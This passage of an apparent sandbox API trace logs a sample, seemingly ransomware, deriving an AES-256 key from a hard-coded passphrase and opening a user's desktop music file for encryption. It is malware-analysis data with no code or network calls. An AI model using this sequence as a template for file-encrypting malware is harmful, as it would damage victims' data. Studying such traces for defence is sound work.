hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0125.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0125.396] FreeLibrary (hLibModule=0x772d0000) returned 1 [0125.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0125.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0125.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0125.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0125.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0125.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0125.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0125.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0125.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0125.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0125.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0125.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0125.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0125.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0125.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0125.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0125.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0125.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0125.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0125.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0125.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0125.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0125.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0125.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0125.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0125.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0125.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0125.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0125.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0125.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0125.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0125.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0125.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0125.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0125.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0125.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0125.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.398] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0125.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0125.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0125.398] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0125.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0125.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0125.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0125.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0125.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0125.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0125.399] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0125.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0125.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0125.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0125.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0125.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0125.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0125.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0125.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0125.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0125.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0125.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0125.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0125.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0125.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0125.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0125.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0125.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0125.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0125.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0125.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0125.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392570 | out: hHeap=0x1780000) returned 1 [0125.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0125.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0125.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0125.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0125.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0125.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0125.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0125.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0125.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0125.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0125.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0125.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0125.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0125.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0125.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0125.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0125.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0125.401] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0125.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9d88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0125.401] CloseHandle (hObject=0x258) returned 1 [0125.402] FreeLibrary (hLibModule=0x772d0000) returned 1 [0125.402] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0125.402] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\oIFaH-1_nryv.mp3", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba8245c0, ftCreationTime.dwHighDateTime=0x1d5f04f, ftLastAccessTime.dwLowDateTime=0x246b8b00, ftLastAccessTime.dwHighDateTime=0x1d5e497, ftLastWriteTime.dwLowDateTime=0x246b8b00, ftLastWriteTime.dwHighDateTime=0x1d5e497, nFileSizeHigh=0x0, nFileSizeLow=0xdbcb, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="oIFaH-1_nryv.mp3", cAlternateFileName="OIFAH-~1.MP3")) returned 0x41ac280 [0125.402] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0125.402] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0125.402] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.402] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0125.402] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.402] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0125.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0125.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0125.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796de8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0125.403] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0125.404] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0125.424] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0125.424] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0125.424] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0125.424] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.424] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0125.424] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.424] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0125.424] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0125.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca8e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0125.425] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0125.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0125.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0125.425] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0125.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0125.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0125.425] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.425] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0125.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca838, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0125.425] CryptHashData (hHash=0x41ac540, pbData=0x17e2728, dwDataLen=0x22, dwFlags=0x1) returned 1 [0125.425] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.425] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0125.425] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0125.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caa60, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0125.426] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac540, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac640) returned 1 [0125.426] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.426] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0125.426] CryptDestroyHash (hHash=0x41ac540) returned 1 [0125.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0125.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e99c8 [0125.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0125.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0125.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0125.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0125.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0125.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0125.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0125.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0125.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0125.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0125.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0125.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0125.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0125.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0125.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0125.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0125.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0125.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0125.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea490 [0125.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0125.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0125.427] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0125.427] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0125.427] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0125.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0125.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0125.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0125.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0125.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0125.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0125.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0125.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0125.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0125.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb450 [0125.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0125.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0125.428] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\oIFaH-1_nryv.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\oifah-1_nryv.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0125.428] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.428] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0125.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0125.429] RtlAllocateHeap (HeapHandle=0x1780000, 